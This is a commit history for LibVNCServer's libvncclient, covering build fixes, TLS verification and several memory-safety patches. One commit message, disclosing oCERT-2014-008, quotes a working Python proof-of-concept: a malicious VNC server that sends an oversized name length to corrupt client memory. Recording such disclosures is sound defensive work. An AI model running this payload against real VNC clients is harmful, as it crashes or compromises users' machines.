summaryrefslogtreecommitdiffstats
path: root/libvncclient
Commit message (Collapse)AuthorAgeFilesLines
* Merge pull request #175 from simonwaterman/x509verifyChristian Beier2017-05-141-4/+100
|\ | | | | Added support for X509 server certificate verification
| * Removed comment left over from developmentsimon2017-04-251-3/+0
| |
| * Modified certificate verification for compatibility with GnuTLS 2.12.23simon2017-04-251-22/+102
| |
| * Added support for X509 server certificate verification as part of the ↵simon2017-04-201-3/+22
| | | | | | | | handshake process.
* | X509 certificate verification for OpenSSLsimon2017-05-051-92/+157
|/
* Set trueColour flag to 1 instead of 255dborth2017-04-041-1/+1
| | | | | | | | | | | It turns out some server implementations (namely VMware ESXi 6.5) expect 1 as the only non-zero value for the SetPixelFormat message whereas the protocol states every non-zero value is valid (https://github.com/rfbproto/rfbproto/blob/master/rfbproto.rst#setpixelformat). Anyway, setting this to 1 shouldn't hurt. Fixes #141
* Fix building for Android and add build instructions to READMEChristian Beier2017-03-261-1/+1
|
* Fix a compiler warningChristian Beier2017-03-261-1/+1
|
* Merge branch 'circle' of https://github.com/ldmnyblzs/libvncserver into ↵Christian Beier2017-03-269-144/+145
|\ | | | | | | | | | | | | ldmnyblzs-circle Conflicts: libvncclient/rfbproto.c
| * Add function pointers for every type of rectangleBalazs Ludmany2016-06-299-120/+121
| |
* | drop autotoolsBert van Hall2017-02-131-29/+0
| | | | | | | | | | | | | | | | Since autotools officially is no longer supported (see various github issues), drop the related infrastructure to stop tempting people to use it for building. Signed-off-by: Bert van Hall <bert.vanhall@gmx.de>
* | libvncclient/tls_openssl: support openssl 1.1.xBert van Hall2017-01-311-5/+4
| | | | | | | | | | | | | | | | Treat openSSL data structures as opaque to achieve compatibility with openSSL 1.1.x. While at it, fix order of cleaning up in open_ssl_connection(). Signed-off-by: Bert van Hall <bert.vanhall@avionic-design.de>
* | Fix LibVNCClient compilation with MSVC 2014Christian Beier2017-01-282-0/+6
| |
* | Fix building on OSX.Christian Beier2016-11-241-1/+1
| |
* | Fix heap overflow in the ultra.c decoderJosef Gajdusek2016-11-141-4/+4
| | | | | | | | | | | | The Ultra type tile decoder does not use the _safe variant of the LZO decompress function, which allows a maliciuous server to overwrite parts of the heap by sending a larger-than-specified LZO data stream.
* | Fix heap overflows in the various rectangle fill functionsJosef Gajdusek2016-11-141-0/+24
|/ | | | | | Altough rfbproto.c does check whether the overall FramebufferUpdate rectangle is too large, some of the individual encoding decoders do not, which allows a malicious server to overwrite parts of the heap.
* Merge pull request #105 from cgeorges82/masterChristian Beier2016-05-301-4/+15
|\ | | | | fix for issue #97. Also, this fixes cmake builds for other platforms.
| * Append missing include directory for GNUTLS and OPENSSL in CMake projectCédric Georges2016-03-051-4/+15
| | | | | | | | Append support of gnutls > v 2.99.01 (gnutls_transport_set_global_errno have a different signature)
* | Merge pull request #103 from rdieter/masterChristian Beier2016-04-241-6/+3
|\ \ | | | | | | use namespaced vnc_max macro (issue #102)
| * | use namespaced rfbMax macro (issue #102)Rex Dieter2016-04-181-6/+3
| |/ | | | | | | Not using generic 'max', avoids conflicts with stl_algobase.h
* | Merge pull request #118 from gbdj/threadsafe-100-squashChristian Beier2016-04-242-0/+23
|\ \ | | | | | | libvncclient/tls_gnutls.c: Add hooks to WriteToTLS() for optional protection by mutex. (Squashed)
| * | libvncclient/tls_gnutls.c: Add hooks to WriteToTLS() for optional protection ↵gbdj2016-04-232-0/+23
| |/ | | | | | | | | | | | | | | by mutex. Fix upstream issue #100 Squashed commit of the pull request #101 : commit 1c7e01e81862bc46508e675e83c74cc6d63224b0 commit 1e749b094d6696380d3f0540a00138d7e3427874
* | Merge pull request #110 from AlexejStukov/patch-1Christian Beier2016-04-121-1/+2
|\ \ | | | | | | break statement out of case
| * | break statement out of caseNorrec2016-04-071-1/+2
| |/
* | Fix buffer overflow when applying client encodingszbierak2016-04-121-1/+2
|/
* Ignore null pointers in FillRectangle() and CopyRectangleFromRectangle()SpaceOne2016-01-271-0/+8
|
* Properly document HandleCursorShape and GotCursorShapeProc.Christian Beier2015-12-031-6/+0
|
* Fix some typos (found by codespell)Stefan Weil2015-10-092-2/+2
| | | | Signed-off-by: Stefan Weil <sw@weilnetz.de>
* Re-add the useful bits of 9aa9ac59b4cb10bfca93456a3098e348de172d7f.Christian Beier2015-04-172-0/+7
|
* Revert "Add libvncclient/h264.c to dist tarball."Christian Beier2015-04-171-1/+1
| | | | This reverts commit 9aa9ac59b4cb10bfca93456a3098e348de172d7f.
* Revert "LibVNCClient: Add H.264 encoding for framebuffer updates"Christian Beier2015-04-174-680/+1
| | | | | | | | This reverts commit d891478ec985660c03f95cffda0e6a1ad4ba350c. Conflicts: configure.ac libvncclient/h264.c
* Merge pull request #69 from nopdotcom/masterChristian Beier2015-04-171-1/+4
|\ | | | | Avoid divide-by-zero in raw encoding (OSX RealVNC)
| * Avoid divide-by-zero in raw encoding (OSX RealVNC)Jay Carlson2015-03-271-1/+4
| | | | | | | | | | | | | | | | | | OS X RealVNC server crashes out Remmina because the server can provoke bytesPerLine to be zero. Assume this is coding for zero lines. The condition could be checked before the calculation of bytesPerLine. I don’t understand the preconditions of this code to say one way or the other.
* | Set autotools SOVERSION.Peter Spiess-Knafl2015-02-091-1/+1
| |
* | Merge pull request #51 from maxnet/masterChristian Beier2015-01-021-0/+10
|\ \ | | | | | | Initialize libgcrypt before use
| * | Initialize libgcrypt before useFloris Bos2015-01-021-0/+10
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | https://www.gnupg.org/documentation/manuals/gcrypt/Initializing-the-library.html "Before the library can be used, it must initialize itself. This is achieved by invoking the function gcry_check_version" Closes issue #45 Tested with krdc + libgcrypt 1.6.1 (libgcrypt20-dev Ubunutu package) connecting to a Mac Mini. Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | | Merge pull request #50 from maxnet/masterChristian Beier2015-01-021-0/+4
|\ \ \ | |/ / | | | tls_openssl.c: define _XOPEN_SOURCE for extra POSIX functionality
| * | tls_openssl.c: enable extra POSIX functionality to get PTHREAD_MUTEX_RECURSIVEFloris Bos2015-01-011-0/+4
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | On some systems pthread_mutexattr_settype() and PTHREAD_MUTEX_RECURSIVE are not available by default. Either _XOPEN_SOURCE or _POSIX_C_SOURCE needs to be set to to the right level before including any system include file in order to have them exposed. Fixes the following compile error: == tls_openssl.c: In function 'dyn_create_function': tls_openssl.c:91:2: warning: implicit declaration of function 'pthread_mutexattr_settype' [-Wimplicit-function-declaration] MUTEX_INIT(value->mutex); ^ tls_openssl.c:42:40: error: 'PTHREAD_MUTEX_RECURSIVE' undeclared (first use in this function) pthread_mutexattr_settype(&mutexAttr, PTHREAD_MUTEX_RECURSIVE);\ ^ tls_openssl.c:91:2: note: in expansion of macro 'MUTEX_INIT' MUTEX_INIT(value->mutex); ^ tls_openssl.c:42:40: note: each undeclared identifier is reported only once for each function it appears in pthread_mutexattr_settype(&mutexAttr, PTHREAD_MUTEX_RECURSIVE);\ ^ tls_openssl.c:91:2: note: in expansion of macro 'MUTEX_INIT' MUTEX_INIT(value->mutex); ^ tls_openssl.c: In function 'InitializeTLS': tls_openssl.c:42:40: error: 'PTHREAD_MUTEX_RECURSIVE' undeclared (first use in this function) pthread_mutexattr_settype(&mutexAttr, PTHREAD_MUTEX_RECURSIVE);\ ^ tls_openssl.c:156:5: note: in expansion of macro 'MUTEX_INIT' MUTEX_INIT(mutex_buf[i]); ^ tls_openssl.c: In function 'ssl_verify': tls_openssl.c:177:7: warning: variable 'err' set but not used [-Wunused-but-set-variable] int err, i; ^ tls_openssl.c:176:14: warning: variable 'client' set but not used [-Wunused-but-set-variable] rfbClient *client; ^ make[3]: *** [tls_openssl.lo] Error 1 == Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | | Fix another MinGW64 build issue. WSAEWOULDBLOCK is not MinGW-specific.Christian Beier2014-12-301-2/+0
|/ /
* | Fix compiler warnings libvncclient + gtkvncviewerFloris Bos2014-12-291-1/+1
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Fixes the following compiler warnings. gtkvncviewer: == CC gtkvncviewer-gtkvncviewer.o gtkvncviewer.c: In function ‘GtkDefaultLog’: gtkvncviewer.c:591:2: warning: format not a string literal and no format arguments [-Wformat-security] fprintf (stdout, buf); ^ == libvncclient: == CC rfbproto.lo In file included from rfbproto.c:2376:0: zrle.c: In function 'HandleZRLE8': zrle.c:201:5: warning: pointer targets in passing argument 2 of 'HandleZRLETile8' differ in signedness [-Wpointer-sign] int result=HandleZRLETile(client,buf,remaining,rx+i,ry+j,subWidth,subHeight); ^ zrle.c:37:33: note: expected 'uint8_t *' but argument is of type 'char *' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ rfbproto.c:2364:22: note: in definition of macro 'CONCAT2' #define CONCAT2(a,b) a##b ^ zrle.c:37:24: note: in expansion of macro 'CONCAT2E' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ zrle.c:79:12: note: in expansion of macro 'HandleZRLETile' static int HandleZRLETile(rfbClient* client, ^ In file included from rfbproto.c:2385:0: zrle.c: In function 'HandleZRLE16': zrle.c:201:5: warning: pointer targets in passing argument 2 of 'HandleZRLETile16' differ in signedness [-Wpointer-sign] int result=HandleZRLETile(client,buf,remaining,rx+i,ry+j,subWidth,subHeight); ^ zrle.c:37:33: note: expected 'uint8_t *' but argument is of type 'char *' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ rfbproto.c:2364:22: note: in definition of macro 'CONCAT2' #define CONCAT2(a,b) a##b ^ zrle.c:37:24: note: in expansion of macro 'CONCAT2E' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ zrle.c:79:12: note: in expansion of macro 'HandleZRLETile' static int HandleZRLETile(rfbClient* client, ^ In file included from rfbproto.c:2387:0: zrle.c: In function 'HandleZRLE15': zrle.c:201:5: warning: pointer targets in passing argument 2 of 'HandleZRLETile15' differ in signedness [-Wpointer-sign] int result=HandleZRLETile(client,buf,remaining,rx+i,ry+j,subWidth,subHeight); ^ zrle.c:37:33: note: expected 'uint8_t *' but argument is of type 'char *' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ rfbproto.c:2364:22: note: in definition of macro 'CONCAT2' #define CONCAT2(a,b) a##b ^ zrle.c:37:24: note: in expansion of macro 'CONCAT2E' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ zrle.c:79:12: note: in expansion of macro 'HandleZRLETile' static int HandleZRLETile(rfbClient* client, ^ In file included from rfbproto.c:2396:0: zrle.c: In function 'HandleZRLE32': zrle.c:201:5: warning: pointer targets in passing argument 2 of 'HandleZRLETile32' differ in signedness [-Wpointer-sign] int result=HandleZRLETile(client,buf,remaining,rx+i,ry+j,subWidth,subHeight); ^ zrle.c:37:33: note: expected 'uint8_t *' but argument is of type 'char *' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ rfbproto.c:2364:22: note: in definition of macro 'CONCAT2' #define CONCAT2(a,b) a##b ^ zrle.c:37:24: note: in expansion of macro 'CONCAT2E' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ zrle.c:79:12: note: in expansion of macro 'HandleZRLETile' static int HandleZRLETile(rfbClient* client, ^ In file included from rfbproto.c:2398:0: zrle.c: In function 'HandleZRLE24': zrle.c:201:5: warning: pointer targets in passing argument 2 of 'HandleZRLETile24' differ in signedness [-Wpointer-sign] int result=HandleZRLETile(client,buf,remaining,rx+i,ry+j,subWidth,subHeight); ^ zrle.c:37:33: note: expected 'uint8_t *' but argument is of type 'char *' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ rfbproto.c:2364:22: note: in definition of macro 'CONCAT2' #define CONCAT2(a,b) a##b ^ zrle.c:37:24: note: in expansion of macro 'CONCAT2E' #define HandleZRLETile CONCAT2E(HandleZRLETile,REALBPP) ^ zrle.c:79:12: note: in expansion of macro 'HandleZRLETile' static int HandleZRLETile(rfbClient* client, ^ In file included from rfbproto.c:2401:0: zrle.c: In function 'HandleZRLE24Down': zrle.c:201:5: warning: pointer targets in passing argument 2 of 'HandleZRLETile24Down' differ in signedness [-Wpointer-sign] int result=HandleZRLETile(client,buf,remaining,rx+i,ry+j,subWidth,subHeight); ^ zrle.c:40:33: note: expected 'uint8_t *' but argument is of type 'char *' #define HandleZRLETile CONCAT3E(HandleZRLETile,REALBPP,Down) ^ rfbproto.c:2366:24: note: in definition of macro 'CONCAT3' #define CONCAT3(a,b,c) a##b##c ^ zrle.c:40:24: note: in expansion of macro 'CONCAT3E' #define HandleZRLETile CONCAT3E(HandleZRLETile,REALBPP,Down) ^ zrle.c:79:12: note: in expansion of macro 'HandleZRLETile' static int HandleZRLETile(rfbClient* client, ^ In file included from rfbproto.c:2404:0: zrle.c: In function 'HandleZRLE24Up': zrle.c:201:5: warning: pointer targets in passing argument 2 of 'HandleZRLETile24Up' differ in signedness [-Wpointer-sign] int result=HandleZRLETile(client,buf,remaining,rx+i,ry+j,subWidth,subHeight); ^ zrle.c:43:33: note: expected 'uint8_t *' but argument is of type 'char *' #define HandleZRLETile CONCAT3E(HandleZRLETile,REALBPP,Up) ^ rfbproto.c:2366:24: note: in definition of macro 'CONCAT3' #define CONCAT3(a,b,c) a##b##c ^ zrle.c:43:24: note: in expansion of macro 'CONCAT3E' #define HandleZRLETile CONCAT3E(HandleZRLETile,REALBPP,Up) ^ zrle.c:79:12: note: in expansion of macro 'HandleZRLETile' static int HandleZRLETile(rfbClient* client, ^ == Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | Fix libva related compile errorsFloris Bos2014-12-291-0/+4
|/ | | | | | | | | | | | | - Make h264.c compile with recent libva version by including va_compat.h - Only enable libva if libva-x11 is installed - Modified configure help text Previous help text suggested libva was only build when --with-libva was specified, while actual behavior is to build it by default. Warning: THIS CODE IS UNTESTED. Lacking a h.264 capable VNC server Also no attempt is made to support platforms not using X11 Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* Fix possible libvncclient ServerInit memory corruption.Christian Beier2014-10-101-1/+2
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This fixes the following oCERT report (oCERT-2014-008 pt.2): There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client. Field Size --------------------------------- name-length [4] name-string [name-length] Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd. Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably. import socket,struct,sys HOST = "" PORT = 5900 c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) c.bind((HOST,PORT)) c.listen(1) conn,addr = c.accept() print "Connected by ", addr protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" conn.send(protocolVersion3008) data = conn.recv(1024) # Receive the version from them. secTypeNone = "\x01\x01" secTypeAuth = "\x01\x02" conn.send(secTypeNone) data = conn.recv(1024) # Receive the secType choice from them. secResultOk = "\x00" * 4 secResultNo = "\x00\x00\x00\x01" conn.send(secResultOk) data = conn.recv(1024) # Receive the ClientInit (Shared-flag). frameBufferWidth = 0x0480 frameBufferHeight = 0x0360 bitsPerPixel = 0x20 depth = 0x18 bigEndian = 0x1 trueColor = 0x0 redM = 0x0 greenM = 0x0 blueM = 0x0 redS = 0x0 greenS = 0x0 blueS = 0x0 padding = "\x00\x00\x00" nameLength = 0xffffffff nameString = "AA" * 0xFFFF + "\x00\x0a" conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString ) c.close()
* Fix potential memory corruption in libvncclient.Christian Beier2014-10-101-0/+7
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Fixes (maybe amongst others) the following oCERT report ([oCERT-2014-008]): LibVNCServer HandleRFBServerMessage rfbServerCutText malicious msg.sct.length It looks like there may be a chance for potential memory corruption when a LibVNCServer client attempts to process a Server Cut Text message. case rfbServerCutText: { char *buffer; if (!ReadFromRFBServer(client, ((char *)&msg) + 1, sz_rfbServerCutTextMsg - 1)) return FALSE; msg.sct.length = rfbClientSwap32IfLE(msg.sct.length); << Retrieve malicious length buffer = malloc(msg.sct.length+1); << Allocate buffer. Can return 0x0 if (!ReadFromRFBServer(client, buffer, msg.sct.length)) << Attempt to write to buffer return FALSE; buffer[msg.sct.length] = 0; << Attempt to write to buffer if (client->GotXCutText) client->GotXCutText(client, buffer, msg.sct.length); << Attempt to write to buffer free(buffer); break; } If a message is provided with an extremely large size it is possible to cause the malloc to fail, further leading to an attempt to write 0x0.
* Add libvncclient/h264.c to dist tarball.Christian Beier2014-10-061-1/+1
| | | | Otherwise the sources from a 'make dist' package wouldn't compile.
* Merge pull request #38 from LibVNC/autotools-fix-revisitedChristian Beier2014-10-021-1/+1
|\ | | | | Autotools fix revisited.
| * Rename obsolete INCLUDES to AM_CPPFLAGSBrian Bidulock2014-10-021-1/+1
| |
* | `strings.h` and `resolv.h` are not available on MSVC, and some POSIX ↵Daniel Cohen Gindi2014-09-202-1/+10
|/ | | | | | functions are renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* Fix tv_usec calculationJohannes Schindelin2014-09-021-1/+1
| | | | | | This bug was introduced in the MSVC patches. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Use Windows' critical sections to emulate pthread's mutexesDaniel Cohen Gindi2014-09-021-13/+36
| | | | | | | | | | | With Microsoft Visual C++, we cannot use pthreads (MinGW sports an emulation library which is the reason we did not need Windows-specific hacks earlier). Happily, it is very easy to provide Windows-specific emulations for the pthread calls we use. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Perform pointer arithmetic on char * instead of void *Daniel Cohen Gindi2014-09-021-1/+1
| | | | | | | | Microsoft Visual C++ does not allow pointer arithmetic on void pointers. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>